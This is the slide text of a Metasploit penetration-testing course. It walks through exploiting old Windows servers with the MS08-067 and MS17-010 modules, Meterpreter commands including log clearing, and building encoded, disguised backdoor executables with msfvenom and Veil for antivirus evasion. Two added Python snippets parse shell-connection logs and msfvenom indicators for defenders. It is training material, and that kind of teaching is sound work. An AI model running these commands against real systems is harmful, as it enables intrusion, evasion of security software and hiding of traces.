
METASPLOIT

ANGGRAHITO, S.ST., S.T., M.B.A


OVERVIEW

• Install Metasploit
• POC

Copyright ©TAALENTA
OVERVIEW METASPLOIT
• Leading exploit framework: an advanced open-source platform for developing, testing, and using exploit code, written in Ruby.
• First created by H. D. Moore in 2003 as a portable network tool written in Perl. The Metasploit Framework was completely rewritten in Ruby in 2007.
• On October 21, 2009, Rapid7 acquired the Metasploit Project.
• Rapid7 is a security company that provides unified vulnerability management solutions.
• Rapid7 and the security community still support Metasploit by constantly updating it with new exploits.

OVERVIEW METASPLOIT
• METASPLOIT FRAMEWORK – Community Edition
• METASPLOIT PRO – Commercial Enterprise Edition

INSTALL METASPLOIT
Installation on Xubuntu:
Command:
sudo curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

START METASPLOIT

Command : msfconsole

ARCHITECTURE OF METASPLOIT

Don't start by exploiting targets!

It is important to understand the design and basic structure of Metasploit first.

Metasploit User Interfaces
• Msfconsole – the interactive console, the most commonly used interface
• Armitage – a graphical user interface (GUI), a third-party add-on to MSF

ARCHITECTURE OF METASPLOIT
Libraries:
• REX
• MSF::Core – Datastore, EventDispatcher, ModuleManager, PluginManager, Framework
• MSF::Base – Config, Logging, Serializer, Simple, Sessions
Interfaces (MSF::UI):
• Console, CLI, WebUI, GUI, Armitage
Modules:
• Payloads, Exploits, Encoders, Nops, Aux
Plugins

ARCHITECTURE OF METASPLOIT
Directory :
/opt/metasploit-framework/
/opt/metasploit-framework/bin/
/opt/metasploit-framework/embedded/
/opt/metasploit-framework/LICENSES

5607 directories and 36585 files

ARCHITECTURE OF METASPLOIT
Directory :
/opt/metasploit-framework/embedded/framework/
/opt/metasploit-framework/embedded/framework/modules

ARCHITECTURE OF METASPLOIT
Metasploit Libraries
Some of the most important libraries are outlined below.

REX
• The basic library for most tasks
• Handles sockets, protocols, text transformations, and other low-level tasks
• SSL, SMB, HTTP, XOR, Base64, Unicode

MSF::CORE
• Provides the “basic” API
• Defines the Metasploit Framework

MSF::BASE
• Provides the “friendly” API
• Provides simplified APIs for use in the Framework

BASIC COMMANDS
msf6> help

BASIC COMMANDS
Database Backend Commands

Important Commands:

• db_status
• db_nmap
• workspace
• hosts
• services

BASIC COMMANDS

• msf6> workspace -h
• msf6> db_status

BASIC COMMANDS

• services -p 21 -c name,port,proto
• services -R 192.168.1.7

BASIC COMMANDS
Information Gathering using "db_nmap"

db_nmap -A --script *vuln* <ip address>

• db_nmap -A --script *vuln* 192.168.1.13
AUXILIARY
Auxiliary modules provide hundreds of functions, such as protocol enumeration, port scanning, fuzzing, sniffing, etc.

msf6 > show auxiliary

AUXILIARY
Scanning smb version (Port 445)

Setting IP Target and running scanner

AUXILIARY
Port Scanner:
msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS 10.10.10.0/24
msf > run

DNS Enumeration:
msf > use auxiliary/gather/dns_enum
msf > set DOMAIN target
msf > run

FTP Server:
msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > run

Proxy Server:
msf > use auxiliary/server/socks4
msf > run

FRAMEWORK COMPONENTS

Metasploit Meterpreter:
• Runs as a DLL injection payload on the target PC, providing control over the target system
Metasploit Venom (msfvenom):
• Creates standalone payloads as an executable, Ruby script, or shellcode

SHELL & METERPRETER

• windows/shell/ : basically gives a command prompt.

• windows/meterpreter/ : gives a Meterpreter session. A Meterpreter session contains more than just a shell.

SHELL

METERPRETER

Meterpreter Commands
sysinfo – Display system information
ps – List and display running processes
kill <PID> – Terminate a running process
getuid – Display user ID
upload / download – Upload / download a file
pwd / lpwd – Print working directory (remote / local)
cd / lcd – Change directory (remote / local)
cat – Display file content
bglist – Show background running scripts
bgrun – Make a script run in the background
bgkill – Terminate a background process
background – Move the active session to the background
edit <file name> – Edit a file in the vi editor
shell – Access a shell on the target machine
migrate <PID> – Switch to another process
idletime – Display idle time of the user
screenshot – Take a screenshot
clearev – Clear the system logs
? / help – Show all the commands
exit / quit – Exit the Meterpreter session
shutdown / reboot – Shut down / restart the system
use – Load an extension
channel – Show active channels
BIND AND REVERSE SHELL

REVERSE SHELL
Attacker (IP: 1.2.3.4) exploits the victim's PC/machine (IP: 5.6.7.8).
The attacker listens on port 4444; the victim opens a reverse TCP connection to 1.2.3.4:4444.

BIND SHELL
Attacker (IP: 1.2.3.4) exploits the victim's PC/machine (IP: 5.6.7.8).
The victim listens on port 4444; the attacker opens a bind TCP connection to 5.6.7.8:4444.
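As an added defender-side example (not part of the deck), the two diagrams above become a triage rule over firewall logs: the side that opens the listener decides which perimeter control, egress or ingress filtering, would have stopped the connection. The log line format, the benign address 93.184.216.34, and the use of 1.2.3.4, 5.6.7.8 and port 4444 as attacker, victim and shell port are constructed from the diagram.

```python
import re
from collections import defaultdict

# Constructed firewall log lines (not from the deck). Addresses and port
# follow the diagram above: attacker 1.2.3.4, victim 5.6.7.8, shell port 4444.
SAMPLE_LOG = """\
2024-01-01T10:00:01Z ALLOW TCP 5.6.7.8:51022 -> 1.2.3.4:4444 SYN
2024-01-01T10:00:05Z ALLOW TCP 1.2.3.4:40123 -> 5.6.7.8:4444 SYN
2024-01-01T10:00:09Z ALLOW TCP 5.6.7.8:51023 -> 93.184.216.34:443 SYN
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<action>\w+) TCP (?P<src>[\d.]+):(?P<sport>\d+) -> "
    r"(?P<dst>[\d.]+):(?P<dport>\d+) SYN$"
)


def parse_syn_lines(text):
    """Yield (src_ip, dst_ip, dst_port) for every connection-initiating (SYN) line."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m["src"], m["dst"], int(m["dport"])


def shell_direction(src_ip, dst_ip, dst_port, attacker_ip, shell_port=4444):
    """Classify one SYN by which side opened the listener.

    reverse: victim initiates, attacker listens (only egress filtering stops it).
    bind:    attacker initiates, victim listens (ingress filtering stops it).
    """
    if dst_port != shell_port:
        return None
    if dst_ip == attacker_ip:
        return "reverse"
    if src_ip == attacker_ip:
        return "bind"
    return None


def triage(text, attacker_ip="1.2.3.4", shell_port=4444):
    """Map each victim host to the shell directions seen and the control that stops each."""
    control = {"reverse": "egress filtering", "bind": "ingress filtering"}
    findings = defaultdict(dict)
    for src, dst, dport in parse_syn_lines(text):
        kind = shell_direction(src, dst, dport, attacker_ip, shell_port)
        if kind == "reverse":
            findings[src][kind] = control[kind]   # victim is the source
        elif kind == "bind":
            findings[dst][kind] = control[kind]   # victim is the destination
    return dict(findings)
```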
EXPLOIT TARGET
• Windows Server 2000
• Windows Server 2003

WALKTHROUGH
Exploit the target walkthrough:
1. Exploit: use <module exploit>
2. Set target IP address: set RHOSTS <IP address target>
3. Payload: set PAYLOAD <module payload>
4. Set listener host: set LHOST <your machine's IP address>
5. Run the module: exploit -j

Useful commands:
1. Search: search <module exploit>
2. Show info: show info
3. Show options: show options
4. Show targets: show targets
5. Choose the fingerprinted target machine: set target <list number>
WINDOWS SERVER 2000
USING PAYLOAD SHELL

MODULE EXPLOIT MS08_067_NETAPI
Search <text title of module>
Module : exploit/windows/smb/ms08_067_netapi

MODULE EXPLOIT MS08_067_NETAPI
Show options

• Need to set RHOSTS (target IP)
• Need to change the payload option (change from meterpreter to shell)

MODULE EXPLOIT MS08_067_NETAPI
Setting RHOSTS, PAYLOAD, LPORT and the exploit command

• set RHOSTS <IP target machine>
• set PAYLOAD windows/shell_reverse_tcp
• set LPORT 4444 (4444 is the default, but it can be changed to another port)
• exploit

When a session has opened, it means the exploit has succeeded and the target is compromised.

WINDOWS SERVER 2003
USING PAYLOAD METERPRETER

MODULE EXPLOIT MS17_010_PSEXEC
Search <text title of module>
Module : exploit/windows/smb/ms17_010_psexec

Use exploit :
use exploit/windows/smb/ms17_010_psexec

MODULE EXPLOIT MS17_010_PSEXEC
Show options

set RHOSTS <IP target Machine>


• set RHOSTS 192.168.1.3

MODULE EXPLOIT MS17_010_PSEXEC
Change PAYLOAD from Shell into Meterpreter

Set Payload :
set PAYLOAD windows/meterpreter/reverse_tcp

MODULE EXPLOIT MS17_010_PSEXEC
exploit -j runs the exploit as a background job

sessions <session number from the list>

METERPRETER

METERPRETER
Enter the Windows shell

Exit back to Meterpreter

METERPRETER

sessions -l shows the active sessions (there are 3 open sessions in the background)

PART II

OVERVIEW
• KEY TAKEAWAYS DAY 6
• ARMITAGE
• EXPLOIT WINDOWS 2008 SERVER
• EXPLOIT METASPLOITABLE 2
• SHIKATA_GA_NAI (MSFVENOM /Client Side Attacks)
• VEIL EVASION FRAMEWORK

ARMITAGE
Armitage is a GUI front-end for the Metasploit Framework developed by Raphael Mudge with the goal of helping security professionals better understand hacking and to help them realize the power of Metasploit. It was originally made for Cyber Defense Exercises, but has since expanded its user base to other penetration testers.

Armitage is a graphical cyber attack management tool for the Metasploit Project that visualizes targets and recommends exploits. It is a free and open source network security tool notable for its contributions to red team collaboration allowing for: shared sessions, data, and communication through a single Metasploit instance.
Source: https://en.wikipedia.org/wiki/Armitage_(computing)

SETUP ARMITAGE
Install Armitage

sudo apt install -y armitage

msfupdate

Setup database.yml

cd /opt/metasploit-framework/embedded/framework/config/
sudo cp /home/pentest/.msf4/database.yml .

SETUP ARMITAGE

Edit the file /home/<user>/.bashrc (exported so that child processes such as Armitage inherit it):

export MSF_DATABASE_CONFIG="/opt/metasploit-framework/embedded/framework/config/database.yml"

Edit the file /etc/environment (plain KEY=VALUE; this file is not a shell script):

MSF_DATABASE_CONFIG="/opt/metasploit-framework/embedded/framework/config/database.yml"

Re-initialise the msfconsole database:

msfdb reinit

SETUP ARMITAGE

sudo -E armitage

SET EXPLOIT RANK (1)
Setting the exploit rank: Set Exploit Rank -> Poor*

LISTENERS (SET LHOST) (2)
Setting the listener host (LHOST): Set LHOST -> your machine's IP address

REVERSE (WAIT FOR) (3)
Setting the listener tunnel (bind or reverse): Listeners -> Reverse (wait for)

ADD HOSTS (4)

ADDED 1 HOST (5)

HOSTS (NMAP SCAN) (6)
Nmap Scan -> Intense Scan

HOSTS (NMAP SCAN) (7)
Nmap Scan -> Intense Scan, no ping

HOSTS (SCAN COMPLETE) (8)

FIND ATTACKS (9)

FIND ATTACKS (PROCESS RUNNING) (10)

FIND ATTACKS (ATTACK ANALYSIS COMPLETE) (11)

HAIL MARY (12)

HAIL MARY (OPTIONS) (13)

HAIL MARY (PROGRESS) (14)

HAIL MARY (COMPROMISE) (15)

METERPRETER, INTERACT, METERPRETER SHELL (16)

METERPRETER SHELL (17)

SHIKATA GA NAI
Japanese phrase meaning "It can't be helped" or "nothing can be done"

MSFVENOM
The msfvenom tool can be used to generate Metasploit payloads (such as Meterpreter) as standalone files and optionally encode them.
Command:
Run with '-l payloads' to get a list of payloads.
$ msfvenom -p [PayloadPath] -f [FormatType] LHOST=[LocalHost (if reverse connection)] LPORT=[LocalPort] -e x86/shikata_ga_nai

Example
Reverse Meterpreter payload as an executable and redirected into a file:
$ msfvenom -p windows/meterpreter/reverse_tcp -f exe LHOST=10.1.1.1 LPORT=4444 -e x86/shikata_ga_nai > cmd.exe

MSFVENOM
Format Options (specified with -f)
--help-formats – List available output formats
exe – Executable
pl – Perl
rb – Ruby
raw – Raw shellcode
c – C code
Encoding Payloads with msfvenom
The msfvenom tool can be used to apply a level of encoding for anti-virus bypass. Run with '-l encoders' to get a list of encoders.
$ msfvenom -p [Payload] -e [Encoder] -f [FormatType] -i [EncodeIterations] LHOST=[LocalHost (if reverse conn.)] LPORT=[LocalPort]

Example

Encode a payload 10 times using the shikata_ga_nai encoder and output it as an executable:
$ msfvenom -p windows/meterpreter/reverse_tcp -i 10 -e x86/shikata_ga_nai -f exe LHOST=10.1.1.1 LPORT=4444 > mal.exe

A FEW EXAMPLES OF CREATING BACKDOORS

• msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.8 LPORT=7777 -f exe -e x86/shikata_ga_nai -i 10 > calc.exe
• msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.8 LPORT=9999 -f exe --encrypt rc4 -e x86/shikata_ga_nai -i 10 > a9999.exe
• msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.8 LPORT=9999 -f c -b '\x00\x0a\x0d' -e x64/shikata_ga_nai -i 10 -o ac9999.exe
• msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=192.168.33.134 LPORT=4567

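Added example, not part of the deck: the same msfvenom command lines, as they would appear in shell history or process-creation telemetry, parsed on the blue-team side to pull out the payload, the encoder settings and the callback endpoint (LHOST:LPORT) that becomes the indicator to block and hunt for. The flag table covers the msfvenom options used on this slide; the two sample command lines are copied from it and treated as constructed telemetry.

```python
import shlex

# Sample command lines copied from the slide above (constructed telemetry, not real logs).
OBSERVED_CMDLINES = [
    "msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.8 LPORT=7777 "
    "-f exe -e x86/shikata_ga_nai -i 10 > calc.exe",
    "msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o sc_x64_msf.bin "
    "EXITFUNC=thread LHOST=192.168.33.134 LPORT=4567",
]

# msfvenom flags that take a value, mapped to the field name we record them under.
VALUED_FLAGS = {"-p": "payload", "-f": "format", "-e": "encoder", "-i": "iterations",
                "-o": "outfile", "-b": "badchars", "--encrypt": "encrypt"}


def parse_msfvenom(cmdline):
    """Split an msfvenom invocation into its options and KEY=VALUE datastore settings.

    Unrecognised tokens (shell redirections, unknown flags) are kept under 'other' so
    that a partially understood command line still yields its payload and callback.
    """
    toks = shlex.split(cmdline)
    if not toks or not toks[0].endswith("msfvenom"):
        raise ValueError("not an msfvenom invocation")
    info = {"payload": None, "format": None, "encoder": None, "iterations": 1,
            "outfile": None, "badchars": None, "encrypt": None, "options": {}, "other": []}
    i = 1
    while i < len(toks):
        tok = toks[i]
        if tok in VALUED_FLAGS and i + 1 < len(toks):
            field = VALUED_FLAGS[tok]
            info[field] = int(toks[i + 1]) if field == "iterations" else toks[i + 1]
            i += 2
        elif "=" in tok and not tok.startswith("-"):
            key, value = tok.split("=", 1)
            info["options"][key.upper()] = value   # e.g. LHOST, LPORT, EXITFUNC
            i += 1
        else:
            info["other"].append(tok)
            i += 1
    return info


def callback_endpoint(info):
    """Return 'LHOST:LPORT' for a reverse payload, or None when no callback is configured."""
    host = info["options"].get("LHOST")
    port = info["options"].get("LPORT")
    if info["payload"] and "reverse" in info["payload"] and host and port:
        return f"{host}:{port}"
    return None
```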
SETUP

• sudo apt install veil-evasion


• veil -h

• Choose “s” for “silent”


• Choose “Y” for “Yes”

SETUP

• Enter password for user pentest

SETUP
• Wine installation and configuration, please wait
• If an error/failed message appears, it's okay; please continue and wait

SETUP
• Well done! Veil installation is finished!

VEIL FRAMEWORK
• Running Veil Evasion

VEIL FRAMEWORK
• Available Payloads

Command :
use <number>

Example:
use 7

VEIL FRAMEWORK

VEIL FRAMEWORK
• Payload Options

Command:
set LHOST <your IP address as listener>
set LPORT <your port>

To build the executable file, enter this command:
generate

VEIL FRAMEWORK
• Enter a name and create the backdoor
Input name of your backdoor payload:

Example:
(default is payload): game

The output backdoor is written to the directory:
/var/lib/veil/output/compiled/

Result:
/var/lib/veil/output/compiled/game.exe

POC (Proof of Concept)

ACCESS SIMPLE WEB SERVER :

ADDRESS:

http://<your Machine’s IP Address>:8000/

Example: http://192.168.1.13:8000/

POC (Proof of Concept)

Click the "Add" button
Click the "Add" button
Click the "Close" button
Click the "Save" button
Click the "Save" button
Click the "Open Folder" button

Execute the backdoor (game.exe) file!

RUNNING LISTENER

Wait until you see "exploit -j" and "Started Reverse TCP handler on <your machine's IP address/listener address>:<listener port>"

Example:
Started Reverse TCP handler on 192.168.1.13:7777

ENTER METERPRETER

ENTER METERPRETER

THANK YOU
